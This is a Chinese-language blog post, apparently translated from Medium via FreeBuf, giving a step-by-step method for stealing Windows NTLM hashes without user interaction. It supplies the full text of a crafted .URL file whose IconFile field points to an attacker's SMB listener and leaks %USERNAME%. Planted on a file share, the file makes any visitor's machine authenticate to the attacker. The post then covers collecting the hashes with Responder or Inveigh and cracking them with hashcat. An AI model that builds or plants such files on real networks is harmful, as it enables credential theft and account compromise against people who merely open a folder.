一種無需用戶交互捕獲哈希的方法

這段時間我在微博上翻看了大量的帖子，其中有一篇來自@insertscript的帖子，介紹了一種無互動式抓取哈希值的技巧。其使用.URL文件訪問環境變數，用戶無需任何用戶交互即可連接到攻擊者的文件共享。

以下內容摘自@insertscript的帖子：

「只要explorer.exe的的查看包含.URL文件的文件夾，它就會在發送實際請求之前查找任何指定的環境變數，如％PATH％或％USERNAME％，從而將內容泄露給由攻擊者控制的伺服器。「（https://insert-script.blogspot.com/2018/08/leaking-environment-variables-in_20.html）

首先，我們在攻擊機上設置SMBListener（通常情況下在內網環境中，大多數公司都會阻止SMB流量出站）。

接著，我們在文件共享上創建一個文本文件。（創建文件後，你可以將其放在任何共享上）。

將以下內容粘貼到文本文件中：

[InternetShortcut]URL=whateverWorkingDirectory=whateverIconFile=\PutYourSmbListenerShareHere\%USERNAME%.iconIconIndex=1

以上你只需將IconFile PATH替換為你在SMBServer，Responder或Inveigh中設置的共享即可。注意：這裡的％USERNAME％。icon不要改動。如下：

現在，請確保你已勾選文件名擴展和隱藏文件選項。

使用.URL擴展重命名文件注意：當使用相同文件名時，將導致無法正常工作因此，建議大家每次都只創建唯一的文件名（例如1.url，2.url等）！

重命名後應該看起來像下面這樣：

此時，在你的smb listener應該已經獲取到了一個連接！

現在，任何人只要訪問該共享，都將嘗試自動的向你的SMB listener進行身份驗證。

複製哈希並使用hashcat破解。

將其粘貼到文件中

啟動hashcat（希望密碼包含在你的字典列表中）

成功解出了密碼！

最後，感謝@insertscript的分享！也希望大家可以在微博上關注我（@markmo），我會第一時間向大家分享我學到的東西，就像其他人給予我的一樣！

*參考來源：medium，FB小編secist編譯，轉載請註明來自FreeBuf.COM

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！